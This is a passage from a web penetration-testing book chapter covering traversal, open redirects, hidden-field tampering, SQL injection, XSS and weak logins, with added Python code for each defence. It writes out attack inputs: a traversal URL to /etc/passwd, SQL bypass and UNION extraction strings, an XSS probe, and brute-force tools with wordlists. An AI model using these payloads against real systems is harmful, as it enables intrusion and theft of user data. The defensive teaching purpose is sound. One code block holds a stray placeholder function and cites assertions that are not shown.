A simple way to manipulate such a value is to step through the page submission by using a web proxy, such as those built into the commercial web vulnerability scanners I mention or the free Burp Proxy (https://portswigger.net/burp/proxy.html).
Web proxies sit between your web browser and the server you're testing and allow you to manipulate information sent to the server. To begin, you must configure your web browser to use the local proxy of 127.0.0.1 on port 8080. To access this in Firefox, choose Options, click Advanced, click the Network tab, click the Connection Settings button, and then select the Manual Proxy Configuration radio button. In Internet Explorer, choose the Gear icon ⇒ Internet Options, then click the LAN Settings button under Connections, select the Use a proxy server for your LAN check box, and enter the appropriate hostname/IP address and port number.
All you have to do is intercept the request and change the length of the submitted value before it reaches the server; the browser-side limit never comes into play, and the server receives whatever length you give it. You can also use the Web Developer add-on to remove maximum form lengths defined in web forms, as shown in Figure 15-2.
Figure 15-2: Using Firefox Web Developer to reset form field lengths.
URL manipulation
An automated input attack manipulates a URL and sends it back to the server, telling the web application to do various things, such as redirect to third-party sites, load sensitive files off the server, and so on. Local file inclusion (LFI), and its close relative directory traversal, is one such vulnerability: the web application accepts a file path as URL input and returns (or includes) the specified file's contents, as in the following example of an attempted breach of a Linux server's passwd file:
https://www.your_web_app.com/onlineserv/Checkout.cgi?state=detail&language=english&imageSet=/../..//../..//../..//../..///etc/passwd
It's important to note that most recent application platforms, such as ASP.NET and Java, provide file-handling APIs that make this kind of manipulation of URL variables harder to fall into, but the protection lives in the application code rather than the platform, and I do still see this vulnerability periodically.
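Here is an added example, written for this edit and not taken from the book, of the server-side check that defeats both the directory traversal attacks covered under the countermeasures above and the imageSet=/../../etc/passwd request just shown. It is Python rather than the CGI the example URL implies; the document root, the images/logo.txt file and the attack strings are constructed for the demonstration.

```python
import os
import tempfile


class TraversalError(ValueError):
    """Raised when a requested path would leave the document root."""


def safe_join(doc_root, user_path):
    """Resolve a client-supplied path under doc_root or raise TraversalError.

    Two layers: first reject (do not "clean up") any absolute path or any
    '..' segment, because that input is an attack rather than a typo; then
    canonicalise with realpath so a symlink inside the root cannot point
    outside it either.
    """
    root = os.path.realpath(doc_root)
    normalised = user_path.replace("\\", "/")
    segments = [s for s in normalised.split("/") if s not in ("", ".")]
    if normalised.startswith("/") or ".." in segments:
        raise TraversalError("rejected path: %r" % user_path)
    full = os.path.realpath(os.path.join(root, *segments))
    if full != root and not full.startswith(root + os.sep):
        raise TraversalError("path escapes document root: %r" % user_path)
    return full


def read_public_file(doc_root, user_path):
    """Serve a file the way Checkout.cgi's imageSet parameter should have."""
    with open(safe_join(doc_root, user_path), "rb") as handle:
        return handle.read()


def demo():
    """Constructed fixture: a temporary document root holding one image file.

    Returns a dict mapping each requested path to the bytes served or to the
    string 'blocked'.
    """
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "logo.txt"), "w") as handle:
        handle.write("logo")
    attempts = [
        "images/logo.txt",                                  # legitimate
        "/../..//../..//../..//../..///etc/passwd",         # the example above
        "../../etc/passwd",                                 # plain traversal
        "/etc/passwd",                                      # absolute path
        "images\\..\\..\\etc\\passwd",                      # Windows separators
    ]
    results = {}
    for path in attempts:
        try:
            results[path] = read_public_file(root, path)
        except TraversalError:
            results[path] = "blocked"
    return results
```

Rejecting rather than normalising is deliberate: a request that contains `..` or starts with `/` is never a legitimate image name, and silently collapsing it would hide the attack from your logs.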
The following links demonstrate another example of URL trickery called URL redirection (also known as an open redirect):
http://www.your_web_app.com/error.aspx?URL=http://www.bad~site.com&ERROR=Path+'OPTIONS'+is+forbidden.
http://www.your_web_app.com/exit.asp?URL=http://www.bad~site.com
In both situations, an attacker can exploit this vulnerability by sending the link to unsuspecting users via e-mail or by posting it on a website. Because the link begins with your trusted domain, users (and many e-mail filters) see nothing wrong with it; when users click the link, they can be redirected to a malicious third-party site containing malware or inappropriate material.
If you have nothing but time on your hands, you might uncover these types of vulnerabilities manually. However, in the interest of accuracy (and sanity), these attacks are best carried out by running a web vulnerability scanner because they can detect the weakness by sending hundreds and hundreds of URL iterations to the web system very quickly.
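An added example (not from the book) of how the error.aspx?URL= and exit.asp?URL= handlers above should validate the redirect target before issuing it. The ALLOWED_HOSTS set, www.bad-site.com and the other attack strings are assumptions constructed for this illustration.

```python
from urllib.parse import urlparse

# Assumption for this example: the application's own host names.
ALLOWED_HOSTS = {"www.your_web_app.com"}


def vulnerable_redirect_target(url_param):
    """What error.aspx?URL=... and exit.asp?URL=... effectively do."""
    return url_param


def safe_redirect_target(url_param, default="/"):
    """Return a Location value that is guaranteed to stay on our own site.

    Accepts a site-relative path ('/account') or an absolute http(s) URL
    whose host is in ALLOWED_HOSTS; everything else becomes `default`.
    """
    if not url_param:
        return default
    candidate = url_param.replace("\\", "/")   # browsers treat '/\evil' as '//evil'
    parsed = urlparse(candidate)
    if not parsed.scheme and not parsed.netloc:
        # Relative URL: exactly one leading slash, so '//evil.com' is refused.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    # Absolute URL: scheme and host must both be ours.  parsed.hostname has
    # already dropped any 'user@' prefix, which defeats the
    # 'http://www.your_web_app.com@www.bad-site.com/' trick.
    if parsed.scheme in ("http", "https") and parsed.hostname in ALLOWED_HOSTS:
        return candidate
    return default


# Constructed values an attacker might place in the URL parameter.
ATTACK_INPUTS = [
    "http://www.bad-site.com",
    "//www.bad-site.com/login",
    "/\\www.bad-site.com",
    "http://www.your_web_app.com@www.bad-site.com/",
    "javascript:alert(1)",
]
```

An allowlist of hosts is the only robust rule; checking that the parameter "starts with" your domain or "contains" it is what the userinfo and protocol-relative inputs above are designed to slip past.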
Hidden field manipulation
Some websites and applications embed hidden fields within web pages to pass state information between the web server and the browser. Hidden fields are represented in a web form as <input type="hidden">. Because of poor coding practices, hidden fields often contain confidential information (such as product prices on an e-commerce site) that should be stored only in a back-end database. Users shouldn't see hidden fields (hence the name), but the curious attacker can discover and exploit them with these steps:
1. View the HTML source code.
To see the source code in Internet Explorer and Firefox, you can usually right-click on the page and select View Source or View Page Source.
2. Change the information stored in these fields.
For example, a malicious user might change the price from $100 to $10.
3. Repost the page back to the server.
This step allows the attacker to obtain ill-gotten gains, such as a lower price on a web purchase.
Such vulnerabilities are becoming rare, but like URL manipulation, the possibility exists, so it pays to keep an eye out.
Using hidden fields for authentication (login) mechanisms can be especially dangerous. I once came across a multifactor authentication intruder lockout process that relied on a hidden field to track the number of times the user attempted to log in. This variable could be reset to zero for each login attempt and thus facilitate a scripted dictionary or brute-force login attack. It was somewhat ironic that the security control to prevent intruder attacks was vulnerable to an intruder attack.
Several tools, such as the proxies that come with commercial web vulnerability scanners or Burp Proxy, can easily manipulate hidden fields. Figure 15-3 shows the WebInspect SPI Proxy interface and a web page's hidden field.
Figure 15-3: Using WebInspect to find and manipulate hidden fields.
If you come across hidden fields, you can try to manipulate them to see what can be done. It's as simple as that.
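As an added example, not code from the book, here is the checkout logic that the $100-to-$10 price change above exploits, beside the server-side version that makes the hidden field irrelevant. The SKU catalog and the two form posts are constructed for the illustration.

```python
from decimal import Decimal
from urllib.parse import parse_qs

# Constructed catalog; in a real application this is the back-end database
# that the text says prices should live in.
CATALOG = {"SKU-100": Decimal("100.00"), "SKU-200": Decimal("250.00")}


def vulnerable_checkout_total(form_body):
    """Trusts the price that came back from the browser's hidden field."""
    fields = parse_qs(form_body)
    quantity = int(fields["qty"][0])
    price = Decimal(fields["price"][0])      # attacker-controlled
    return price * quantity


def hardened_checkout_total(form_body):
    """Only the SKU and quantity come from the client; the price is looked up.

    A price field in the post is simply ignored, and the quantity is range
    checked so a negative number cannot turn a purchase into a refund.
    """
    fields = parse_qs(form_body)
    sku = fields.get("sku", [""])[0]
    quantity = int(fields.get("qty", ["0"])[0])
    if sku not in CATALOG:
        raise ValueError("unknown SKU")
    if not 1 <= quantity <= 99:
        raise ValueError("quantity out of range")
    return CATALOG[sku] * quantity


# The form post as the page generated it, and the same post after the
# attacker edits the hidden price field (in the page source or in a proxy).
HONEST_POST = "sku=SKU-100&qty=1&price=100.00"
TAMPERED_POST = "sku=SKU-100&qty=1&price=10.00"
```

The same rule applies to the lockout counter in the anecdote above: anything the server needs to trust (a price, an attempt count, a user role) is looked up or kept in server-side session state, never round-tripped through the browser.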
Code injection and SQL injection
Similar to URL manipulation attacks, code-injection attacks manipulate specific system variables. Here's an example:
http://www.your_web_app.com/script.php?info_variable=X
Attackers who see this variable can start entering different data into the info_variable field, changing X to something like one of the following lines:
http://www.your_web_app.com/script.php?info_variable=Y
http://www.your_web_app.com/script.php?info_variable=123XYZ
This is a rudimentary example but, nonetheless, the web application might respond in a way that gives attackers more information than they want, such as detailed errors or access into data fields they're not authorized to access. The invalid input might also cause the application or the server to hang. Similar to the case study earlier in the chapter, hackers can use this information to determine more about the web application and its inner workings, which can ultimately lead to a serious system compromise.
If HTTP variables are passed in the URL and are easily accessible, it's only a matter of time before someone exploits your web application.
I once used a web application to manage some personal information that did just this. Because a "name" parameter was part of the URL, anyone could gain access to other people's personal information by changing the "name" value. For example, if the URL included "name=kbeaver", a simple change to "name=jsmith" would bring up J. Smith's home address, Social Security number, and so on. Ouch! I alerted the system administrator to this vulnerability. After a few minutes of denial, he agreed that it was indeed a problem and proceeded to work with the developers to fix it.
Code injection can also be carried out against back-end SQL databases, an attack known as SQL injection. Malicious attackers insert SQL syntax, such as quote characters, comment sequences, and SELECT, UNION, and OR clauses, into URL parameters and form fields so that the application's own query is rewritten to extract information from the SQL database that the web application interacts with. SQL injection is made possible by applications that build queries by string concatenation instead of using parameterized queries, combined with informative errors returned from database servers and web servers.
Two general types of SQL injection are standard (also called error-based) and blind. Error-based SQL injection is exploited based on error messages returned from the application when invalid information is input into the system. Blind SQL injection happens when error messages are disabled, requiring the hacker or automated tool to infer what the database is returning from subtle differences in the application's response, such as a true/false change in the page or a deliberate delay introduced with a time-based payload.
There's a quick (although not as reliable as it used to be) way to determine whether your web application is vulnerable to SQL injection. Simply enter a single apostrophe (') in your web form fields or at the end of the URL. If a SQL error is returned, odds are good that SQL injection is present.
You're definitely going to get what you pay for when it comes to scanning for and uncovering SQL injection flaws with a web vulnerability scanner. As with URL manipulation, you're much better off running a web vulnerability scanner to check for SQL injection, which allows an attacker to inject database queries and commands through the vulnerable page to the back-end database. Figure 15-4 shows numerous SQL injection vulnerabilities discovered by the Netsparker vulnerability scanner.
Figure 15-4: Netsparker discovered SQL injection vulnerabilities.
When you discover SQL injection vulnerabilities, you might be inclined to stop there and not try to exploit the weakness. That's fine. However, I prefer to see how far I can get into the database system. I recommend using any SQL injection capabilities built into your web vulnerability scanner if possible so you can demonstrate the flaw to management.
If your budget is limited, you may consider using a free SQL injection tool such as SQL Power Injector (www.sqlpowerinjector.com) or the Firefox add-on SQL Inject Me (https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me).
I cover database security more in depth in Chapter 16.
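An added example, not from the book, that reproduces the mechanics in a throwaway SQLite database: the concatenated login query that the apostrophe test breaks and that a comment sequence or a UNION rewrites, beside the parameterized query that cannot be rewritten. The users table, credentials and payload strings are constructed (and passwords are stored in the clear only to keep the extraction visible; a real table holds salted hashes).

```python
import sqlite3


def build_db():
    """Constructed in-memory users table standing in for the back-end database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "kbeaver", "WhAteVur!"), (2, "jsmith", "s3cret")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: the injectable pattern."""
    sql = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same query with bound parameters: input can never change the SQL."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def apostrophe_probe(conn, value):
    """The quick check from the text: does a lone apostrophe raise a SQL error?"""
    try:
        login_vulnerable(conn, value, "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


# Constructed payloads for login_vulnerable; both are inert against
# login_parameterized, which treats them as literal user IDs.
BYPASS_USER = "jsmith' --"                      # comments out the password check
EXTRACT_USER = ("' UNION SELECT password FROM users "
                "WHERE name = 'jsmith' --")      # returns another user's secret
```

The UNION payload is the error-based/standard case in miniature: the query still succeeds, so the stolen value is printed wherever the application prints the user's name. With errors suppressed the same flaw is found blind, by sending payloads that make the WHERE clause true or false and watching whether the login succeeds.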
Cross-site scripting
Cross-site scripting (XSS) is perhaps the most well-known and widespread web vulnerability. It occurs when a web page includes user input in its output without proper validation and encoding, so that input containing HTML or JavaScript is rendered and executed by the browser instead of being displayed as text. A criminal hacker can take advantage of the absence of input filtering and output encoding and cause a web page to execute malicious code on any user's computer that views the page.
For example, an XSS attack can display the user ID and password login page from another rogue website. If users unknowingly enter their user IDs and passwords in the login page, the user IDs and passwords are entered into the hacker's web server log file. Other malicious code can be sent to a victim's computer and run with the same security privileges as the web browser or e-mail application that's viewing it on the system; the malicious code could provide a hacker with full read/write access to browser cookies (other than those flagged HttpOnly), browser history files, or even permit the download/installation of malware.
A simple test shows whether your web application is vulnerable to XSS. Look for any fields in the application that accept user input (such as on a login or search form), and enter the following JavaScript statement:
<script>alert('XSS')</script>
If a window pops up that reads XSS, as shown in Figure 15-5, the application is vulnerable. The XSS-Me Firefox add-on (https://addons.mozilla.org/en-US/firefox/addon/xss-me/) is a novel way to test for this vulnerability as well.
Figure 15-5: Script code reflected to the browser.
There are many more iterations for exploiting XSS, such as those requiring user interaction via the JavaScript onmouseover event handler. As with SQL injection, you really need to use an automated scanner to check for XSS. Both Netsparker and Acunetix Web Vulnerability Scanner do a great job of finding XSS. However, they often tend to find different XSS issues, a detail that highlights the importance of using multiple scanners when you can. Figure 15-6 shows some sample XSS findings in Acunetix Web Vulnerability Scanner.
Figure 15-6: Using Acunetix Web Vulnerability Scanner to find cross-site scripting in a web application.
Another web vulnerability scanner that's very good at uncovering XSS that many other scanners won't find is AppSpider (formerly NTOSpider) from Rapid7 (www.rapid7.com/products/appspider). In my experience, AppSpider works better than other scanners at performing authenticated scans against applications that use multi-factor authentication systems. AppSpider should definitely be on your radar. Never forget this: When it comes to web vulnerabilities, the more scanners the better! If anything, someone else might end up using one of the scanners you don't use!
Countermeasures against input attacks
Websites and applications must filter incoming data. It's as simple as that. The sites and applications must check and ensure that the data entered fits within the parameters of what the application is expecting. If the data doesn't match, the application should generate an error or return to the previous page. Under no circumstances should the application accept the junk data, process it, and reflect it back to the user.
Secure software coding practices can eliminate all these issues if they're made a critical part of the development process. Developers should know and implement these best practices:
Never present static values that the web browser and the user don't need to see. Instead, this data should be implemented within the web application on the server side and retrieved from a database only when needed.
Validate all input on the server side (length, type, character set, and range) regardless of any limits the browser enforces, and encode all user-supplied data for the context in which it is output (HTML entity encoding for page content, for example). Filtering out <script> tags alone is not enough: attackers use event handlers such as onerror and onmouseover, and malformed tags, to get around such filters. Disable detailed web server and database-related error messages if possible.
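The added example below (mine, not the book's) shows the two countermeasures the list above asks for: server-side length and character-set validation that does not depend on the maxlength from the earlier login form, and HTML output encoding that turns the <script>alert('XSS')</script> test string into harmless text. It also includes the naive strip-the-<script>-tag filter to show how it is bypassed. The user ID rule and the search-term limit are assumptions.

```python
import html
import re

# Assumptions for this example: what a valid user ID looks like, and the
# longest search term the application is willing to process.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,12}")
MAX_SEARCH_LEN = 64


class InputRejected(ValueError):
    """Raised when input fails server-side validation."""


def validate_username(raw):
    """Enforce the 12-character limit on the server, not just in the browser.

    The form's maxlength is a usability hint; an attacker strips it with a
    proxy or Web Developer, so the server re-checks length and alphabet.
    """
    if not isinstance(raw, str) or USERNAME_RE.fullmatch(raw) is None:
        raise InputRejected("user ID must be 1-12 characters of [A-Za-z0-9_.-]")
    return raw


def render_search_results_vulnerable(term):
    """Reflects the term verbatim: <script>alert('XSS')</script> executes."""
    return "<p>Results for: %s</p>" % term


def render_search_results(term):
    """Validate length on input, then encode for the HTML context on output."""
    if not isinstance(term, str) or len(term) > MAX_SEARCH_LEN:
        raise InputRejected("search term too long")
    return "<p>Results for: %s</p>" % html.escape(term, quote=True)


def str_ip_script_tags_placeholder():
    """Placeholder name intentionally unused; see strip_script_tags below."""
    return None


def strip_script_tags(term):
    """The 'filter out <script> tags' idea on its own, to show why it fails."""
    return re.sub(r"(?i)</?script[^>]*>", "", term)
```

Two things the assertions below make visible: encoding leaves the user's text intact while making it inert, and the tag filter is defeated both by a nested `<scr<script>ipt>` (the filter reassembles the tag it was meant to remove) and by an `<img>` with an `onerror` handler that never contained the word script at all.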
Sensitive information stored locally
Quite often as part of my security testing, I use a hex editor to see how an application is storing sensitive information, such as passwords, in memory. When I'm using Firefox and Internet Explorer, I can use a hex editor, such as WinHex (www.x-ways.net/winhex), to search the active memory in these programs and frequently find user ID and password combinations.
I've found that with Internet Explorer this information is kept in memory even after browsing to several other websites or logging out of the application. This memory usage feature poses a security risk on the local system if another user accesses the computer or if the system is infected with malware that can search system memory for sensitive information. The way browsers store sensitive information in memory is also bad news if an application error or system memory dump occurs and the user ends up sending the information to Microsoft (or another browser vendor) for QA purposes. It's also bad news if the information is written to a dump file on the local hard drive and sits there for someone to find.
Try searching for sensitive information stored in memory related to your web application(s) or on standalone programs that require authentication. You just might be surprised at the outcome. Outside of obfuscating or encoding the login credentials, there's unfortunately not a great fix because this "feature" is part of the web browser that developers can't really control.
A similar problem occurs on the client side when HTTP GET requests rather than HTTP POST requests are used to process sensitive information. The following is an example of a vulnerable GET request:
https://www.your_web_app.com/access.php?username=kbeaver&password=WhAteVur!&login=SoOn
GET requests are often stored in the user's web browser history file, web server log files, and proxy log files. GET requests can be transmitted to third-party sites via the HTTP Referer field when the user browses to a third-party site. All of the above can lead to exposure of login credentials and unauthorized web application access. The lesson: Don't use HTTP GET requests for logins. Use HTTP POST requests instead, and carry the credentials in the request body, never in the query string. If anything, consider these vulnerabilities to be a good reason to encrypt the hard drives of your laptops and other computers that are not physically secure!
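As an added example (not from the book), here is detection logic for the exposure just described, run over constructed Apache/nginx combined-format access log lines: it flags GET requests whose query string carries a password or API key, and shows how to redact such values before a log is kept or shipped. The SENSITIVE_PARAMS names and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumption: parameter names that never belong in a query string.
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "pass", "token",
                    "apikey", "api_key", "secret", "sessionid"}

# Apache/nginx "combined" format: ip ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines; the first mirrors the access.php request above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2016:12:00:01 -0500] "GET /access.php?username=kbeaver&password=WhAteVur!&login=SoOn HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2016:12:00:02 -0500] "POST /access.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2016:12:00:03 -0500] "GET /search.php?q=printer HTTP/1.1" 200 2048 "-" "curl/7.47.0"
198.51.100.7 - - [10/Mar/2016:12:00:04 -0500] "GET /api/report?apikey=AKIA1234EXAMPLE&format=csv HTTP/1.1" 200 4096 "-" "python-requests/2.9"
"""


def find_credentials_in_query_strings(log_text):
    """Return one finding per GET line whose query carries a sensitive parameter."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match or match.group("method") != "GET":
            continue
        parts = urlsplit(match.group("target"))
        names = {name.lower() for name, _ in parse_qsl(parts.query, keep_blank_values=True)}
        leaked = sorted(names & SENSITIVE_PARAMS)
        if leaked:
            findings.append({"ip": match.group("ip"), "time": match.group("ts"),
                             "path": parts.path, "params": leaked})
    return findings


def redact_target(target):
    """Replace sensitive query values so the log line can be kept or shipped."""
    parts = urlsplit(target)
    pairs = [(name, "REDACTED" if name.lower() in SENSITIVE_PARAMS else value)
             for name, value in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))
```

Run the finder over a week of logs and you have a list of the endpoints that need converting to POST; run the redactor in the log pipeline in the meantime so the credentials at least stop accumulating in the SIEM and in proxy logs you do not control.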
Default script attacks
Poorly written web programs, such as Hypertext Preprocessor (PHP) and Active Server Pages (ASP) scripts, can allow hackers to view and manipulate files on a web server and do other things they're not authorized to do. These flaws are also common in content management systems (CMSs) that are used by developers, IT staff, and marketing professionals to maintain a website's content. Default script attacks are common because so much poorly written code is freely accessible on websites. Hackers can also take advantage of various sample scripts that install on web servers, especially older versions of Microsoft's IIS web server.
Many web developers and webmasters use these scripts without understanding how they really work or without testing them, which can introduce serious security vulnerabilities.
To test for script vulnerabilities, you can peruse scripts manually or use a text search tool (such as the search function built into the Windows Start menu or the grep command on Linux) to find any hard-coded usernames, passwords, and other sensitive information. Search for admin, root, user, ID, login, signon, password, pass, pwd, and so on. Sensitive information embedded in scripts like this is rarely necessary and is often the result of poor coding practices that give precedence to convenience over security.
Countermeasures against default script attacks
You can help prevent attacks against default web scripts as follows:
Know how scripts work before deploying them within a web environment. Make sure that all default or sample scripts are removed from the web server before putting it into service.
Keep any content management system software updated, especially WordPress (including its plugins and themes), as it tends to be a big target for attackers.
Don't use publicly accessible scripts that contain hard-coded confidential information. They're a security incident in the making.
Set file permissions on sensitive areas of your site/application to prevent public access.
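An added example, not from the book, that automates the search described above: a scanner that walks a web root for script files and reports every line where a variable or key named after one of the listed terms is assigned a quoted literal. The credential pattern, the file-extension list and the sample config.php are constructed for this illustration.

```python
import os
import re
import tempfile

# One regex for the terms the text lists: a variable or key whose name ends
# in one of them, assigned a quoted literal.  Constructed for this example.
CRED_RE = re.compile(
    r"(?i)(?P<key>\$?[a-z_]*(?:admin|root|user(?:name)?|login|signon|"
    r"pass(?:word|wd)?|pwd|secret))\s*[=:]\s*"
    r"(?P<q>[\"'])(?P<value>[^\"']{1,64})(?P=q)")

SCRIPT_EXTENSIONS = (".php", ".asp", ".aspx", ".cgi", ".pl", ".py", ".inc", ".config")


def scan_text(text, filename="<string>"):
    """Return one hit dict per credential-looking assignment in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in CRED_RE.finditer(line):
            hits.append({"file": filename, "line": lineno,
                         "key": match.group("key"), "value": match.group("value")})
    return hits


def scan_tree(root, extensions=SCRIPT_EXTENSIONS):
    """Walk a web root and scan every file with a script-like extension."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    hits.extend(scan_text(handle.read(), os.path.relpath(path, root)))
    return hits


# Constructed PHP file of the kind the text warns about.
SAMPLE_PHP = """<?php
$title = "Welcome";
$db_user = "root";
$db_pass = "Summer2016!";
$conn = mysqli_connect("localhost", $db_user, $db_pass);
"""


def demo_scan():
    """Constructed tree: config.php with embedded credentials plus a .txt note."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "config.php"), "w", encoding="utf-8") as handle:
        handle.write(SAMPLE_PHP)
    with open(os.path.join(root, "README.txt"), "w", encoding="utf-8") as handle:
        handle.write('password = "ignored: not a script extension"\n')
    return scan_tree(root)
```

Expect false positives (a variable called `$user` holding a display name, for instance); the point of the scan is to produce a short list for a human to read, and the same scan belongs in the build pipeline so a new hard-coded secret fails the build rather than reaching the web server.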
Unsecured login mechanisms
Many websites require users to log in before they can do anything with the application. These login mechanisms often don't handle incorrect user IDs or passwords gracefully. They often divulge too much information that an attacker can use to gather valid user IDs and passwords.
To test for unsecured login mechanisms, browse to your application and log in
using an invalid user ID with a valid password,
using a valid user ID with an invalid password, and
using an invalid user ID and invalid password.
After you enter this information, the web application will probably respond with a message similar to Your user ID is invalid or Your password is invalid. The web application might return a generic error message, such as Your user ID and password combination is invalid and, at the same time, return different error codes in the URL for invalid user IDs and invalid passwords, as shown in Figures 15-7 and 15-8.
Figure 15-7: URL returns an error when an invalid user ID is entered.
Figure 15-8: The URL returns a different error when an invalid password is entered.
In either case, this is bad news because the application is telling you not only which parameter is invalid, but also which one is valid. This means that malicious attackers now know a good username or password; their workload has been cut in half! If they know the username (which usually is easier to guess), they can simply write a script to automate the password-cracking process, and vice versa. Watch for subtler tells too: a noticeably slower response for a valid user ID (because the password hash is actually computed) leaks the same information as a different message does.
You should also take your login testing to the next level by using a web login cracking tool, such as Brutus (www.hoobie.net/brutus/index.html), as shown in Figure 15-9. Brutus is a very simple tool that can be used to crack both HTTP and form-based authentication mechanisms by using both dictionary and brute-force attacks.
Figure 15-9: The Brutus tool for testing for weak web logins.
As with any type of password testing, this can be a long and arduous task, and you stand the risk of locking out user accounts. Proceed with caution.
An alternative (and better maintained) tool for cracking web passwords is THC-Hydra (www.thc.org/thc-hydra).
Most commercial web vulnerability scanners have decent dictionary-based web password crackers, but none (that I'm aware of) can do true brute-force testing like Brutus can. As I discuss in Chapter 8, your password-cracking success is highly dependent on your dictionary lists. Here are some popular sites that house dictionary files and other miscellaneous word lists:
ftp://ftp.cerias.purdue.edu/pub/dict
http://packetstormsecurity.org/Crackers/wordlists
www.outpost9.com/files/WordLists.html
Acunetix Web Vulnerability Scanner does a good job testing for weak passwords during its scans. I've successfully used this scanner to uncover weak web passwords that I wouldn't have found otherwise. Such a finding often leads to further penetration of the system.
You might not need a password-cracking tool at all because many front-end web systems, such as storage management systems and IP video and physical access control systems, simply have the passwords that came on them. These default passwords are usually "password," "admin," or nothing at all. Some passwords are even embedded right in the login page's source code, such as the network camera source code shown in lines 207 and 208 in Figure 15-10.
Figure 15-10: A network camera's login credentials embedded directly in its HTML source code.
Countermeasures against unsecured login systems
You can implement the following countermeasures to prevent people from attacking weak login systems in your web applications:
Any login errors that are returned to the end user should be as generic as possible, saying something similar to Your user ID and password combination is invalid.
The application should never return error codes in the URL that differentiate between an invalid user ID and an invalid password.
If a URL message must be returned, the application should keep it as generic as possible. Here's an example:
www.your_web_app.com/login.cgi?success=false
This URL message might not be convenient to the user, but it helps hide the mechanism and the behind-the-scenes actions from the attacker.
Use CAPTCHA (or reCAPTCHA) on web login forms to help slow down automated password-cracking attempts.
Employ an intruder lockout mechanism on your web server or within your web applications to lock user accounts after 10–15 failed login attempts. Keep the failure count on the server side (in the session store or a database), never in a hidden form field or cookie that the client can reset. This chore can also be handled via a third-party web application firewall add-on like I discuss in the later section "Putting up firewalls."
Check for and change any vendor default passwords to something that's easy to remember yet difficult to crack.
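An added example (not the book's) of a login back end that passes the three tests above and implements the countermeasures just listed: one generic message for every failure, the same amount of work for known and unknown user IDs so timing gives nothing away, server-side enforcement of the 12-character limit from the earlier login form, and a server-side lockout counter of the kind the hidden-field anecdote showed going wrong. The threshold, lockout window and PBKDF2 parameters are assumptions.

```python
import hashlib
import hmac
import os
import time

MAX_USERNAME_LEN = 12          # matches the login form's maxlength above
LOCKOUT_THRESHOLD = 10         # failed attempts before the account locks
LOCKOUT_SECONDS = 15 * 60
GENERIC_ERROR = "Your user ID and password combination is invalid."


def _hash_password(password, salt, iterations=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


class LoginService:
    """Minimal login back end with the countermeasures from this section."""

    def __init__(self, clock=time.time):
        self._users = {}        # username -> (salt, pbkdf2 hash)
        self._failures = {}     # username -> (count, locked_until); server side only
        self._clock = clock
        # A decoy credential so that an unknown user ID costs exactly one
        # PBKDF2 computation, the same as a known one (no timing tell).
        self._decoy_salt = os.urandom(16)
        self._decoy_hash = _hash_password(os.urandom(8).hex(), self._decoy_salt)

    def add_user(self, username, password):
        salt = os.urandom(16)
        self._users[username] = (salt, _hash_password(password, salt))

    def login(self, username, password):
        """Return (success, message); every failure gets the same message."""
        if not isinstance(username, str) or not 1 <= len(username) <= MAX_USERNAME_LEN:
            return False, GENERIC_ERROR
        now = self._clock()
        count, locked_until = self._failures.get(username, (0, 0.0))
        if now < locked_until:
            return False, GENERIC_ERROR     # locked: same message, no hint
        if locked_until and now >= locked_until:
            count, locked_until = 0, 0.0    # lock expired: start counting again
        salt, stored = self._users.get(username, (self._decoy_salt, self._decoy_hash))
        matched = hmac.compare_digest(_hash_password(password, salt), stored)
        if matched and username in self._users:
            self._failures.pop(username, None)
            return True, "OK"
        count += 1
        if count >= LOCKOUT_THRESHOLD:
            locked_until = now + LOCKOUT_SECONDS
        self._failures[username] = (count, locked_until)
        return False, GENERIC_ERROR
```

Two points worth noting from the design: the lock state lives in `_failures` on the server, so nothing the client submits can reset it, and because a locked account returns the same generic message, an attacker cannot even confirm that the lockout exists, let alone that the user ID is real.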
Hacking Web 2.0
Newer web technologies, originally dubbed "Web 2.0," have changed how the Internet is used. From YouTube to Facebook to Twitter, new server and client-side technologies, such as web services, Ajax, and Flash, are being rolled out as if they're going out of style. And these aren't just consumer technologies. Businesses see the value in them, and developers are excited to utilize the latest and greatest technologies in their environments.
Unfortunately, the downside to these technologies is complexity. These new rich Internet applications, as they're also referred to, are so complex that developers, quality assurance analysts, and security managers are struggling to keep up with all their associated security issues. Don't get me wrong; the vulnerabilities in newer applications are very similar to what shows up with legacy technologies, such as XSS, SQL injection, parameter manipulation, and so on. You have to remain vigilant.
In the meantime, here are some valuable tools you can use to test for flaws in your Web 2.0 applications:
Web Developer (http://chrispederick.com/work/web-developer) for analyzing script code and performing other manual checks.
WSDigger (www.mcafee.com/us/downloads/free-tools/wsdigger.aspx) for analyzing web services.
